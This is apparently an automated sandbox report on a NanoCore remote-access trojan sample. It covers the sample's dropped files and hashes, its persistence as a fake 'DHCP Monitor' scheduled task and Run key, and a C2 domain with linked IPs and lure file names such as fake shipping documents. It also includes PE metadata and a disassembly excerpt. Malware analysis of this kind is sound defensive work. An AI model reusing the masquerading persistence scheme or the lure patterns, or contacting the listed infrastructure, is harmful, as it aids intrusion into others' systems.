      • Successful, ratio: 11.1% (good quality ratio 10.2%)
      • Quality average: 76.5%
      • Quality standard deviation: 31.4%
      HCA Information:
      • Successful, ratio: 96%
      • Number of executed functions: 210
      • Number of non-executed functions: 108
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .exe
      Warnings:
      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 40.88.32.150, 23.54.113.45, 23.54.113.53, 104.43.139.144, 168.61.161.212, 13.64.90.137, 52.255.188.83, 20.82.210.154, 23.10.249.26, 23.10.249.43, 52.155.217.156, 20.54.26.129
      • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.

      Simulations

      Behavior and APIs

      Time | Type | Description
      01:08:01 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Users\user\Desktop\nanocore.exe" s>$(Arg0)
      01:08:01 | API Interceptor | 1034x Sleep call for process: nanocore.exe modified
      01:08:02 | Task Scheduler | Run new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
      01:08:04 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

      Joe Sandbox View / Context

      IPs

      Match: 213.208.152.210
      Associated Sample Name / URL | Detection
      TNT AWB TRACKING DETAILS.exe | malicious
      Uv8hwOAKgm.exe | malicious

          Domains

          Match: chinomso.duckdns.org
          Associated Sample Name / URL | Detection | Context
          TNT AWB TRACKING DETAILS.exe | malicious | 213.208.152.210
          Uv8hwOAKgm.exe | malicious | 213.208.152.210
          DHL AWB TRACKING DETAILS.exe | malicious | 98.143.144.221
          DHL AWB TRACKING DETAILS.exe | malicious | 185.150.24.55
          DHL AWB TRACKING DETAILS.exe | malicious | 185.150.24.55
          PAYMENT COPY.exe | malicious | 185.150.24.55
          Ku2bTlXUN4.exe | malicious | 197.211.59.64
          PAYMENT COPY.exe | malicious | 185.150.24.55
          CHEQUE COPY RECEIPT.exe | malicious | 185.150.24.55
          CHEQUE COPY.exe | malicious | 185.150.24.55
          PAYMENT COPY RECEIPT.exe | malicious | 185.150.24.55
          Shiping Doc BL.exe | malicious | 194.5.98.157
          Shiping Doc BL.exe | malicious | 194.5.98.157
          Shiping Doc BL.exe | malicious | 194.5.98.157
          Shiping Doc BL.exe | malicious | 194.5.98.157
          Shiping Doc BL.exe | malicious | 194.5.98.157
          Shiping Doc BL.exe | malicious | 194.5.98.157
          DHL AWB TRACKING DETAIL.exe | malicious | 194.5.98.56
          odou7cg844.exe | malicious | 129.205.124.145
          DHL AWB TRACKING DETAILS.exe | malicious | 185.244.30.86

          ASN

          Match: NEXTLAYER-ASAT
          Associated Sample Name / URL | Detection | Context
          TNT AWB TRACKING DETAILS.exe | malicious | 213.208.152.210
          Uv8hwOAKgm.exe | malicious | 213.208.152.210
          index_2021-03-02-12_11.dll | malicious | 213.208.134.178
          AI5aGob7HV.dll | malicious | 213.208.134.178
          SkQguXQerV.dll | malicious | 213.208.134.178
          LVFIZ8uZzp.dll | malicious | 213.208.134.178
          Statement as of_03_01_2021.xlsm | malicious | 213.208.134.178
          printouts_of_outstanding_as_of_mar_01_2021.xlsm | malicious | 213.208.134.178
          A43zoxMv6x.dll | malicious | 213.208.134.178
          2rS70o1G3T.dll | malicious | 213.208.134.178
          eXeMEWy2CI.dll | malicious | 213.208.134.178
          3TWrYtkzly.dll | malicious | 213.208.134.178
          Statement_of_Account_as_of_mar_01_2021.xlsm | malicious | 213.208.134.178
          index_2021-03-01-17_13.dll | malicious | 213.208.134.178
          printouts_of_outstanding_as_of_03_01_2021.xlsm | malicious | 213.208.134.178
          DZoj4wicd0.dll | malicious | 213.208.134.178
          uwq8T3mqDx.dll | malicious | 213.208.134.178
          E2uiGA3X2v.dll | malicious | 213.208.134.178
          RjIx2AoDBJ.dll | malicious | 213.208.134.178
          v2dw80uF0x.dll | malicious | 213.208.134.178

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Category:dropped
          Size (bytes):321222
          Entropy (8bit):7.952258735347819
          Encrypted:false
          SSDEEP:6144:HdlwCtaK8BqoNWDCANNpFONOXopiTgRXWTZU3qC4XpO5BDiQ2KHeG:/xtaR0oQDCANPYNNpUDJX45BkEeG
          MD5:08803CC817D8B1046A964AF11685B15C
          SHA1:8D76CC9E4E21F90AAA0D2A8E9DD88CCB03349F29
          SHA-256:00343EF156007C41A76ABEBE2B0304AACC7E2B12E0D30EA476ECF8C847A54DFC
          SHA-512:BF548910BE04B74D3A8BF8F058D642DAC070D0CC94CA4EAC04EBC4341967ACFD65E5B64232BE0345994B05A847C7501C122D6F70AEB1FE7121BC8F093028C2F3
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 34%
          Reputation:low
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe:Zone.Identifier
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:true
          Reputation:high, very likely benign file
          Preview: [ZoneTransfer]....ZoneId=0
          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1216
          Entropy (8bit):5.355304211458859
          Encrypted:false
          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
          MD5:69206D3AF7D6EFD08F4B4726998856D3
          SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
          SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
          SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\nanocore.exe.log
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1216
          Entropy (8bit):5.355304211458859
          Encrypted:false
          SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
          MD5:69206D3AF7D6EFD08F4B4726998856D3
          SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
          SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
          SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
          C:\Users\user\AppData\Local\Temp\6tts4zykw681emdi
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:data
          Category:dropped
          Size (bytes):279040
          Entropy (8bit):7.999366542899994
          Encrypted:true
          SSDEEP:6144:BtaK8BqoNWDCANNpFONOXopiTgRXWTZU3qC4XpO5BDiQ2KH5:BtaR0oQDCANPYNNpUDJX45BkE5
          MD5:87317BA0D399E3C709FEE0DD272B7ED2
          SHA1:7A5685DA841B945A6B73BD383D05A83357317296
          SHA-256:96C109DF379172E6953F1E7F38B8C2A638989012662ACDE523BDB7E955F80B68
          SHA-512:8A93D135BD61C1CF00EA7A5E6CCC87BC84C050BE501B3E89829C759463002CFE7B62E52A7C48D1A391BDCF6311014107F8888A81CAFAD4E90B687052389C616C
          Malicious:false
          Reputation:low
          C:\Users\user\AppData\Local\Temp\ks446tcfy17w7jqy3r
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:data
          Category:dropped
          Size (bytes):6661
          Entropy (8bit):7.968813365057691
          Encrypted:false
          SSDEEP:96:vQgv6/j3/PiDWkEusDpXtPYTTHfQk01XYNqHhf3/pQI1opkSuWIxMuOpmAd7g:Y9TNDNtPTGNqHhfRQDNIxSpmsk
          MD5:524E815672556CC3AA17CD643C9A351B
          SHA1:49CF76A2F0F2154A7D81D0800DA2B91F0B470DAA
          SHA-256:0F511CF2EAF33C2F20F912E88EBC0A4421780CDDC561C0AE8512E97EEFDF2A70
          SHA-512:BDCCA0642C4EA27FD4ED06411657EBD2665CF9BBA06FB84DEB68AF6DF387FDD4F932E423006B409B424A45B1B94E6CEEF0CF384F46BF86E181F9FF2298A39D23
          Malicious:false
          C:\Users\user\AppData\Local\Temp\nse444B.tmp\4rmzuajr4dtt.dll
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):5120
          Entropy (8bit):4.188029460900488
          Encrypted:false
          SSDEEP:48:StRJBN/SHIPAK6v5PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqS:GN/KIZ6xYLlIhGXHBgVueKx
          MD5:422D5CA3EDC5BA6E946720C8E1FD69F9
          SHA1:8009E5F7EF9CF4B43DE28D8A11048C195A887EE7
          SHA-256:4D78BB146725F4E19EC267E7DDDC6074F99561482693C6F0CF2C0C64A9EA76A1
          SHA-512:6B3B67C076EE5E61C1EC196D117FF564E7302256C20342750F8CAE761CDE76231B309AEF3A002FD9F0474BDA658DF80577A273EEF30387DE1C56013BD89100E7
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 24%
          C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dll
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):5120
          Entropy (8bit):4.188029460900488
          Encrypted:false
          SSDEEP:48:StRJBN/SHIPAK6v5PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqS:GN/KIZ6xYLlIhGXHBgVueKx
          MD5:422D5CA3EDC5BA6E946720C8E1FD69F9
          SHA1:8009E5F7EF9CF4B43DE28D8A11048C195A887EE7
          SHA-256:4D78BB146725F4E19EC267E7DDDC6074F99561482693C6F0CF2C0C64A9EA76A1
          SHA-512:6B3B67C076EE5E61C1EC196D117FF564E7302256C20342750F8CAE761CDE76231B309AEF3A002FD9F0474BDA658DF80577A273EEF30387DE1C56013BD89100E7
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 24%
          C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):5120
          Entropy (8bit):4.188029460900488
          Encrypted:false
          SSDEEP:48:StRJBN/SHIPAK6v5PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqS:GN/KIZ6xYLlIhGXHBgVueKx
          MD5:422D5CA3EDC5BA6E946720C8E1FD69F9
          SHA1:8009E5F7EF9CF4B43DE28D8A11048C195A887EE7
          SHA-256:4D78BB146725F4E19EC267E7DDDC6074F99561482693C6F0CF2C0C64A9EA76A1
          SHA-512:6B3B67C076EE5E61C1EC196D117FF564E7302256C20342750F8CAE761CDE76231B309AEF3A002FD9F0474BDA658DF80577A273EEF30387DE1C56013BD89100E7
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 24%
          C:\Users\user\AppData\Local\Temp\nsq6D11.tmp\4rmzuajr4dtt.dll
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
          Category:dropped
          Size (bytes):5120
          Entropy (8bit):4.188029460900488
          Encrypted:false
          SSDEEP:48:StRJBN/SHIPAK6v5PXha+HGLFHIPAROGa4zzBvoAXAdUMQ9BgqRuqS:GN/KIZ6xYLlIhGXHBgVueKx
          MD5:422D5CA3EDC5BA6E946720C8E1FD69F9
          SHA1:8009E5F7EF9CF4B43DE28D8A11048C195A887EE7
          SHA-256:4D78BB146725F4E19EC267E7DDDC6074F99561482693C6F0CF2C0C64A9EA76A1
          SHA-512:6B3B67C076EE5E61C1EC196D117FF564E7302256C20342750F8CAE761CDE76231B309AEF3A002FD9F0474BDA658DF80577A273EEF30387DE1C56013BD89100E7
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 24%
          C:\Users\user\AppData\Local\Temp\tmp38C1.tmp
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1298
          Entropy (8bit):5.088310480171837
          Encrypted:false
          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Y+xtn:cbk4oL600QydbQxIYODOLedq3yj
          MD5:E9CED5EE66F06173F8F3B092B79010DE
          SHA1:BC76BE5331F85F7578FD935962AC9B33CC2B4C84
          SHA-256:4660276EA7A477C5FFCA499897DED1F46699637D3BC1BEA135A81CDE2D65E597
          SHA-512:4358E09932D6C4C95A75DC5C9DE1EE7DA6ABE286C9D28C85034261EB1CA37432FAAAC2565CF8132314926B6EDD41DD508F1CC3212EA2D72C098C3219878963EB
          Malicious:true
          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
          C:\Users\user\AppData\Local\Temp\tmp3B81.tmp
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):1310
          Entropy (8bit):5.109425792877704
          Encrypted:false
          SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
          MD5:5C2F41CFC6F988C859DA7D727AC2B62A
          SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
          SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
          SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
          Malicious:false
          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:ISO-8859 text, with no line terminators
          Category:dropped
          Size (bytes):8
          Entropy (8bit):3.0
          Encrypted:false
          SSDEEP:3:rHn:rH
          MD5:6E43C715DA3279FF2D19AACEF5CFA286
          SHA1:0FEE17EEE58CC51B81398326AB1780256AFB4CC4
          SHA-256:17C98C9953D73CDD75CC7FBC761A9FFB005F6D9C941EE28E3453DBA820ED9257
          SHA-512:8E4C1688E2204B5EDD87F277D2211352AFD8CC9CE9F001ACFAEA6791528E5B165B8CA643074B872E2127370F84125860C4413381DBCFFAB0F77C13FF7DF31ECB
          Malicious:true
          Preview: .%+'...H
          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
          Process:C:\Users\user\Desktop\nanocore.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):35
          Entropy (8bit):3.807435516759526
          Encrypted:false
          SSDEEP:3:oNt+WfWLi4dAn:oNwvpAn
          MD5:D43FC6D6883371ADF56312C5835AA391
          SHA1:F520273107B3112B206695814B60A3B99C3AA771
          SHA-256:E311EE9579E921EEBC32D2777133129FF0D961E445A47AD10E01724A4BC40040
          SHA-512:B058B33D57B6340DA0FFEC04B5129C6B20F93C426C51D660B97A2067D9AAF27D7431A5E04FB1A1B078B3B006DF8BE6407E03DA2199090ECF7519267F3BE6649C
          Malicious:false
          Preview: C:\Users\user\Desktop\nanocore.exe

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
          Entropy (8bit):7.952258735347819
          TrID:
          • Win32 Executable (generic) a (10002005/4) 92.16%
          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:nanocore.exe
          File size:321222
          MD5:08803cc817d8b1046a964af11685b15c
          SHA1:8d76cc9e4e21f90aaa0d2a8e9dd88ccb03349f29
          SHA256:00343ef156007c41a76abebe2b0304aacc7e2b12e0d30ea476ecf8c847a54dfc
          SHA512:bf548910be04b74d3a8bf8f058d642dac070d0cc94ca4eac04ebc4341967acfd65e5b64232be0345994b05a847c7501c122d6f70aeb1fe7121bc8f093028c2f3
          SSDEEP:6144:HdlwCtaK8BqoNWDCANNpFONOXopiTgRXWTZU3qC4XpO5BDiQ2KHeG:/xtaR0oQDCANPYNNpUDJX45BkEeG

          File Icon

          Icon Hash:b2a88c96b2ca6a72

          Static PE Info

          General

          Entrypoint:0x40314a
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          DLL Characteristics:
          Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:18bc6fa81e19f21156316b1ae696ed6b

          Entrypoint Preview

          Instruction
          sub esp, 0000017Ch
          push ebx
          push ebp
          push esi
          xor esi, esi
          push edi
          mov dword ptr [esp+18h], esi
          mov ebp, 00409240h
          mov byte ptr [esp+10h], 00000020h
          call dword ptr [00407030h]
          push esi
          call dword ptr [00407270h]
          mov dword ptr [007A3030h], eax
          push esi
          lea eax, dword ptr [esp+30h]
          push 00000160h
          push eax
          push esi
          push 0079E540h
          call dword ptr [00407158h]
          push 00409230h
          push 007A2780h
          call 00007F08B8C3BAE8h
          mov ebx, 007AA400h
          push ebx
          push 00000400h
          call dword ptr [004070B4h]
          call 00007F08B8C39229h
          test eax, eax
          jne 00007F08B8C392E6h
          push 000003FBh
          push ebx
          call dword ptr [004070B0h]
          push 00409228h
          push ebx
          call 00007F08B8C3BAD3h
          call 00007F08B8C39209h
          test eax, eax
          je 00007F08B8C39402h
          mov edi, 007A9000h
          push edi
          call dword ptr [00407140h]
          call dword ptr [004070ACh]
          push eax
          push edi
          call 00007F08B8C3BA91h
          push 00000000h
          call dword ptr [00407108h]
          cmp byte ptr [007A9000h], 00000022h
          mov dword ptr [007A2F80h], eax
          mov eax, edi
          jne 00007F08B8C392CCh
          mov byte ptr [esp+10h], 00000022h
          mov eax, 00000001h

          Rich Headers

          Programming Language:
          • [EXP] VC++ 6.0 SP5 build 8804

          Data Directories

          Name                                 | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x7344          | 0xb4         | .rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x3ac000        | 0x900        | .rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_IAT            | 0x7000          | 0x280        | .rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
          IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |

          Sections

          Name   | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy       | Characteristics
          .text  | 0x1000          | 0x59de       | 0x5a00   | False    | 0.681293402778  | data      | 6.5143386598  | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rdata | 0x7000          | 0x10f2       | 0x1200   | False    | 0.430338541667  | data      | 5.0554281206  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data  | 0x9000          | 0x39a034     | 0x400    | unknown  | unknown         | unknown   | unknown       | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .ndata | 0x3a4000        | 0x8000       | 0x0      | False    | 0               | empty     | 0.0           | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .rsrc  | 0x3ac000        | 0x900        | 0xa00    | False    | 0.409375        | data      | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Resources

          Name          | RVA      | Size  | Type                                                                         | Language | Country
          RT_ICON       | 0x3ac190 | 0x2e8 | data                                                                         | English  | United States
          RT_DIALOG     | 0x3ac478 | 0x100 | data                                                                         | English  | United States
          RT_DIALOG     | 0x3ac578 | 0x11c | data                                                                         | English  | United States
          RT_DIALOG     | 0x3ac698 | 0x60  | data                                                                         | English  | United States
          RT_GROUP_ICON | 0x3ac6f8 | 0x14  | data                                                                         | English  | United States
          RT_MANIFEST   | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English  | United States

          Imports

